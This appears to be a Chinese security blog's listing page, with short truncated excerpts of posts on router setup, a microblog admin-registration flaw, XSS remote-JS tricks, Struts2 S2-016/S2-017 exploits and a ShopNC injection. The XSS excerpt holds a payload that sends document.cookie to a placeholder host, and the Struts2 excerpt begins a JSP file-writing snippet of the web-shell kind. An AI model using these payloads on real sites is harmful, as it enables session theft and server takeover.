-
路由器基础设置
路由器是局域网连接外部网络的重要桥梁,是网络系统中不可或缺的重要部件,也是网络安全的前沿关口。但是路由器的维护却很少被大家所重视。试想,如果路由器连自身的安全都没有保障,整个网络也就毫无安全可言。因此在网络安全管理上,必须对路由器进行合理规...
-
记事狗微博全版本注册管理员漏洞
问题出在一个通用函数上,只要用到这个函数的都存在漏洞,爆管理账号密码的我就不写了,密码有salt意义不大。如果能绕过通用防注入,这套系就太多漏洞了。很多地方都是因为不能注释,闭合不了,而不能进行利用,虽然很多地方都能引入引号但是过滤了一些危...
-
xss中插入远程js的一些技巧
在早期 , 对于xss我们是这样利用的<code><script>window.open(‘http://xxx.xxx/cookie.asp?msg=’+document.cookie)</script>...
-
Struts2 S2-016/S2-017 exp
Struts2的很老的漏洞的一些 exp ,转过来当作记录吧。写入的文件内容:<%if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application...
-
shopnc 6.0单用户版本注入
Shopnc 版本有点多啊 都不太记得是哪个了。 ShopNC®天津网城科技有限公司Copyright© 2007-2009 ShopNC, Powered by ShopNC Team , All Rights Reserved津ICP备...
